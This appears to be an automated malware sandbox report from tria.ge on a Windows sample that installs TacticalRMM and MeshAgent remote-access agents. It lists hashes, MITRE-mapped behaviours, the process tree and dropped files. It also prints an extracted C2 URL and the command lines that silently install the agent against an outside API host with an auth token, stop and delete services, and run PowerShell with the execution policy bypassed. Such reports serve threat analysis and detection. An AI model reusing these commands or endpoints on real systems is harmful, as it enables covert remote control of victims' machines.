Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    139s
  • max time network
    141s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    23/01/2025, 17:56

General

  • Target

    2025-01-23_9f36830d3f867d37d3edd55800ef1677_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe

  • Size

    5.0MB

  • MD5

    9f36830d3f867d37d3edd55800ef1677

  • SHA1

    1d7a79e3a08ce71954416c2cd09ae3c01af082d0

  • SHA256

    16c3ce54c980ffb165d60fb3e4b35e4d5f0c8b8624715f07d11cf460d58e4eb6

  • SHA512

    ee9978bbcf20e6c873a692a1c2d9d2ecf8e95c044c60731d9f4805692718091fd0b84cf88dda436fd9b9e7eab25c1f6c54ec72894cc4840d1744554006e917a8

  • SSDEEP

    49152:cRg0nHQi1uuVvrb/T8vO90d7HjmAFd4A64nsfJWl6OEch34Vx9n5ov0IrQszVS5n:Xi1uuVQEpf5qusz8GEn+eAI

Malware Config

Extracted

Family

meshagent

Version

2

Botnet

TacticalRMM

C2

http://mesh.anyhourgroup.com:443/agent.ashx

Attributes
  • mesh_id

    0x3131CC9705ECDCAD5F1EE47ACE7CAD84F8394DBDFFAEB8E3F5C6440C0CB3FFB2E414D885804144F409EB30B05825A7AE

  • server_id

    C8502FFE2B2CAFF1B88B2A8F6433FD9A17EBF79022C9F02F7132AFDADABDA021D5B8CD8BD7C80BA24141837BBB70734E

  • wss

    wss://mesh.anyhourgroup.com:443/agent.ashx

Signatures

  • Detects MeshAgent payload 1 IoCs
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Meshagent family
  • Blocklisted process makes network request 4 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 12 IoCs
  • Loads dropped DLL 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 6 IoCs
  • Drops file in Program Files directory 20 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-01-23_9f36830d3f867d37d3edd55800ef1677_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-01-23_9f36830d3f867d37d3edd55800ef1677_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2120
    • C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe
      C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe /VERYSILENT /SUPPRESSMSGBOXES
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2468
      • C:\Users\Admin\AppData\Local\Temp\is-5EJ0B.tmp\tacticalagent-v2.8.0-windows-amd64.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-5EJ0B.tmp\tacticalagent-v2.8.0-windows-amd64.tmp" /SL5="$70022,3660179,825344,C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe" /VERYSILENT /SUPPRESSMSGBOXES
        3⤵
        • Executes dropped EXE
        • Drops file in Program Files directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2628
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrpc
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:2672
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 2
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2744
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalrpc
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2688
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalrpc
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2924
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c net stop tacticalagent
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2656
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalagent
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2760
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalagent
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2772
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrmm
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:2648
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 2
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2820
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalrmm
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2548
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalrmm
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2556
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c taskkill /F /IM tacticalrmm.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2588
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM tacticalrmm.exe
            5⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2992
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c sc delete tacticalagent
          4⤵
          • System Location Discovery: System Language Discovery
          PID:676
          • C:\Windows\SysWOW64\sc.exe
            sc delete tacticalagent
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:568
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c sc delete tacticalrpc
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2604
          • C:\Windows\SysWOW64\sc.exe
            sc delete tacticalrpc
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:1800
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c tacticalrmm.exe -m installsvc
          4⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:1360
          • C:\Program Files\TacticalAgent\tacticalrmm.exe
            tacticalrmm.exe -m installsvc
            5⤵
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1760
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c net start tacticalrmm
          4⤵
          • System Location Discovery: System Language Discovery
          PID:576
          • C:\Windows\SysWOW64\net.exe
            net start tacticalrmm
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1372
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 start tacticalrmm
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1584
    • C:\Program Files\TacticalAgent\tacticalrmm.exe
      "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m install --api https://api.anyhourgroup.com --client-id 18 --site-id 20 --agent-type workstation --auth 2950028c1b24bdf87005eb9ecad5a3fdd22b8cd72dc981884f14357831a92cf7
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Program Files directory
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1512
      • C:\Program Files\TacticalAgent\meshagent.exe
        "C:\Program Files\TacticalAgent\meshagent.exe" -fullinstall
        3⤵
        • Sets service image path in registry
        • Executes dropped EXE
        • Drops file in Program Files directory
        PID:2888
      • C:\Program Files\Mesh Agent\MeshAgent.exe
        "C:\Program Files\Mesh Agent\MeshAgent.exe" -nodeid
        3⤵
        • Executes dropped EXE
        PID:2908
  • C:\Program Files\Mesh Agent\MeshAgent.exe
    "C:\Program Files\Mesh Agent\MeshAgent.exe"
    1⤵
    • Executes dropped EXE
    • Drops file in Program Files directory
    PID:2224
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2092
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2236
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1700
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
        PID:2232
      • C:\Windows\System32\wbem\wmic.exe
        wmic SystemEnclosure get ChassisTypes
        2⤵
          PID:1160
        • C:\Windows\System32\wbem\wmic.exe
          wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
          2⤵
            PID:2336
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -noprofile -nologo -command -
            2⤵
            • Drops file in Program Files directory
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:1600
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -noprofile -nologo -command -
            2⤵
            • Drops file in Program Files directory
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:2688
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -noprofile -nologo -command -
            2⤵
            • Drops file in Program Files directory
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:2824
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -noprofile -nologo -command -
            2⤵
            • Drops file in Program Files directory
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:3000
        • C:\Program Files\TacticalAgent\tacticalrmm.exe
          "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m svc
          1⤵
          • Executes dropped EXE
          • Drops file in System32 directory
          • Drops file in Program Files directory
          • Drops file in Windows directory
          • Modifies data under HKEY_USERS
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          PID:2468
          • C:\Program Files\TacticalAgent\tacticalrmm.exe
            "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m checkrunner
            2⤵
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:2284
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive -NoProfile -ExecutionPolicy Bypass C:\ProgramData\TacticalRMM\2129053321.ps1
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:2984
          • C:\Program Files\Mesh Agent\MeshAgent.exe
            "C:\Program Files\Mesh Agent\MeshAgent.exe" -nodeid
            2⤵
            • Executes dropped EXE
            PID:1800
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive -NoProfile -ExecutionPolicy Bypass C:\ProgramData\TacticalRMM\1406696749.ps1
            2⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:2304

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Mesh Agent\MeshAgent.db

          Filesize

          153KB

          MD5

          528392aa18652cbc50917df4537c9971

          SHA1

          03b01f8a51f5b7ee1e131bcaf16818ab26bd12f2

          SHA256

          50ee267bf2f75d4a3c07de4b1c21ce21e59ca92e6cc1463bdc4c713a54c113f9

          SHA512

          f8ef12755d26400a4b4e8dd417bd68b34ac187edf2702654b93e43aca7dc8df6e8536a40713c137467b8d5e8cd7fa920abfb9e7e1e5b67086f9d816ce73b3f5b

        • C:\Program Files\Mesh Agent\MeshAgent.db

          Filesize

          153KB

          MD5

          a9cd90ae1f2fdaab5a063bb7c7b4496b

          SHA1

          d7a88f3995f9eb4260823841d726a314bab2cfc9

          SHA256

          780783de1814ba1d1d55d4a23b8bffdce36ab4bde6798401b9cb84cc2f7543f9

          SHA512

          90d5d70caa69337635f16da5a904e084915eea6b215ee195267dfd12762af54a4c037c21ef06b81e94c89f476a1429a82935866cd0f74eb9698ec1efc5bdcd88

        • C:\Program Files\TacticalAgent\agent.log

          Filesize

          67B

          MD5

          c93c4854bb2bcf62c8c15dcf4d3ff140

          SHA1

          7f5a54c2e0f3c2b29d0e43028c20e7edea60a5e6

          SHA256

          fda3dafec3bdaf94635697b40125f1bfa9814ff0bc9c3a300362783f7f85244c

          SHA512

          aa052436ca1220ea7c80ce90ae70a006165045d21b6e3751e04917aec1fe538b6b13414fe7f2d8ccc767cedd21af74b07182bd2fa009e16548c7ff8cf65636d6

        • C:\ProgramData\TacticalRMM\1406696749.ps1

          Filesize

          35KB

          MD5

          e9fb33c49bee675e226d1afeef2740d9

          SHA1

          ded4e30152638c4e53db4c3c62a76fe0b69e60ab

          SHA256

          44e045ed5350758616d664c5af631e7f2cd10165f5bf2bd82cbf3a0bb8f63462

          SHA512

          2661a981d48d58c9ceb1992e55061ce07af0d53b5f38b07de620376e0ea1d876c7e50965e67aee80fe723968bdb956dc7fd93e7923608534c8fb4d21739dbc48

        • C:\ProgramData\TacticalRMM\2129053321.ps1

          Filesize

          744B

          MD5

          06dc330e445d4cd7a11efaad01cfbc53

          SHA1

          450b3b2e4de7bd76e41a0db23e06a7a4e0268bd0

          SHA256

          75de145c8471a0197b365b03598cb1c9051a16fc0b96402efc2315980d6ac31a

          SHA512

          28f4ba27eee9cd83ba93b6069cdaa78f63402ab4a0171f3f6681ab8133036f5643a384f7942d9c4800c5b02bed194f832763f600adae2e172d94ea6dd187761b

        • C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe

          Filesize

          4.3MB

          MD5

          2f046950e65922336cd83bf0dbc9de33

          SHA1

          ddc64a8b21c8146c93c0b19c1eeb0ef784b980c6

          SHA256

          412e1f600251b21911c582e69381f677e663231f5e1d10786d88a026e00ea811

          SHA512

          a11cbf8b8b692d2d5a0e3af5a97f91a3d1f3e7aa39966eb7d62b3244b3913f2fdc21823d5c94de0d98e579f801709df44433af91567356361d5d9699a93b2cbc

        • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

          Filesize

          914B

          MD5

          e4a68ac854ac5242460afd72481b2a44

          SHA1

          df3c24f9bfd666761b268073fe06d1cc8d4f82a4

          SHA256

          cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

          SHA512

          5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

        • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

          Filesize

          70KB

          MD5

          49aebf8cbd62d92ac215b2923fb1b9f5

          SHA1

          1723be06719828dda65ad804298d0431f6aff976

          SHA256

          b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

          SHA512

          bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

        • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

          Filesize

          1KB

          MD5

          a266bb7dcc38a562631361bbf61dd11b

          SHA1

          3b1efd3a66ea28b16697394703a72ca340a05bd5

          SHA256

          df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

          SHA512

          0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

        • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

          Filesize

          252B

          MD5

          105f58356a460db9692afd8b7dfdddb8

          SHA1

          8a8a5109fbd848115a75d4dc63097f5cc426be45

          SHA256

          a9bafe0de1a75f8e8aebad72a9339a265792e4037eac77a806c6b72ff8fc0eab

          SHA512

          f3e61f64dd913d76d348153c94010f6f045ea4b5893608d558dba7f28ed786e802f413648795b8d20ffb0282eb4bb8b849d0cae1020e73fd8062a72f251c6ac9

        • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          5fed71d61db66bd10ccb71091bb276be

          SHA1

          552e8b14d76bfb0c4a5a0625dcb6fc185a17b9b2

          SHA256

          29cb6c6e3c9a8617a21543802c2819db6f5d555ddeaed5f6e61daba092dd2560

          SHA512

          c765cc7825f893ff51937039da2a762e0dfa560512c1e1b8db7e501774cb6cb7343aa3dfa81af517a7d324aba5882f567470edc2a14f9e2e777943c095e8b59d

        • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

          Filesize

          242B

          MD5

          8e1aec04a2441661088547ae3871fa1f

          SHA1

          d8b6808f08580ca80407e1d38e773ac1a1f2173c

          SHA256

          dc2d9c9420cb25a70d6d6f07128eb7fd1100fe23f66ae2f3156b8376dcaf53ab

          SHA512

          37babed437a1212ddac09d033c9a4386d49deaf4fce4a930b301de00f0e0a710914e553bec01f0205162da2857153f784afdc916198804c62b4f911ca0317edc

        • C:\Windows\Temp\CabB7DC.tmp

          Filesize

          29KB

          MD5

          d59a6b36c5a94916241a3ead50222b6f

          SHA1

          e274e9486d318c383bc4b9812844ba56f0cff3c6

          SHA256

          a38d01d3f024e626d579cf052ac3bd4260bb00c34bc6085977a5f4135ab09b53

          SHA512

          17012307955fef045e7c13bf0613bd40df27c29778ba6572640b76c18d379e02dc478e855c9276737363d0ad09b9a94f2adaa85da9c77ebb3c2d427aa68e2489

        • C:\Windows\Temp\TarB998.tmp

          Filesize

          181KB

          MD5

          4ea6026cf93ec6338144661bf1202cd1

          SHA1

          a1dec9044f750ad887935a01430bf49322fbdcb7

          SHA256

          8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

          SHA512

          6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

        • \Program Files\TacticalAgent\meshagent.exe

          Filesize

          3.3MB

          MD5

          69d3f6259c544aaac291475512a9200b

          SHA1

          830225b4f6a0eba3467844d33ed4cd54c9962f88

          SHA256

          6be666a5707b7ecb98c7247bf27fae4183fbc024178d879c936e37c7bc9edc0b

          SHA512

          267a2c2efecf8941a6aea5f46464c0ba57e0403253695514efc9c86156374f34c05c1473b88517d370d66a417591058cfc0874b738e28353c95d5ea7affb4f5e

        • \Program Files\TacticalAgent\tacticalrmm.exe

          Filesize

          9.2MB

          MD5

          bb383b7c3d5e4acb1001ab099b5b0f3c

          SHA1

          cb0c85f84a454aa4b1aab02bfba47c4355c2311e

          SHA256

          a6d3159c858aa3704f35d69b27829618ad0d1bae894c848a5233100c17464f95

          SHA512

          157dda96d1cacea55a6be27b9d432225b47d7334e664e577cef82a14c7eb1be1b8b84423b3905a4c1caecb5394be264d9b5c3e32109a4893e51a9d406ce740be

        • \Users\Admin\AppData\Local\Temp\is-5EJ0B.tmp\tacticalagent-v2.8.0-windows-amd64.tmp

          Filesize

          3.0MB

          MD5

          a639312111d278fee4f70299c134d620

          SHA1

          6144ca6e18a5444cdb9b633a6efee67aff931115

          SHA256

          4b0be5167a31a77e28e3f0a7c83c9d289845075b51e70691236603b1083649df

          SHA512

          f47f01d072ff9ed42f5b36600ddfc344a6a4b967c1b671ffc0e76531e360bfd55a1a9950305ad33f7460f3f5dd8953e317b108cd434f2db02987fa018d57437c

        • memory/1512-32-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/1512-48-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/1512-118-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/1512-121-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/1512-122-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/1512-123-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/1512-128-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/1512-117-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/1512-33-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/1600-96-0x000000001B3D0000-0x000000001B6B2000-memory.dmp

          Filesize

          2.9MB

        • memory/1600-97-0x0000000001CB0000-0x0000000001CB8000-memory.dmp

          Filesize

          32KB

        • memory/1760-24-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/2284-270-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/2284-271-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/2468-29-0x0000000000400000-0x00000000004D7000-memory.dmp

          Filesize

          860KB

        • memory/2468-127-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/2468-7-0x0000000000401000-0x00000000004B7000-memory.dmp

          Filesize

          728KB

        • memory/2468-4-0x0000000000400000-0x00000000004D7000-memory.dmp

          Filesize

          860KB

        • memory/2628-28-0x0000000000400000-0x0000000000712000-memory.dmp

          Filesize

          3.1MB

        • memory/2628-14-0x0000000000400000-0x0000000000712000-memory.dmp

          Filesize

          3.1MB

        • memory/2688-105-0x000000001B270000-0x000000001B552000-memory.dmp

          Filesize

          2.9MB

        • memory/2688-106-0x0000000001DC0000-0x0000000001DC8000-memory.dmp

          Filesize

          32KB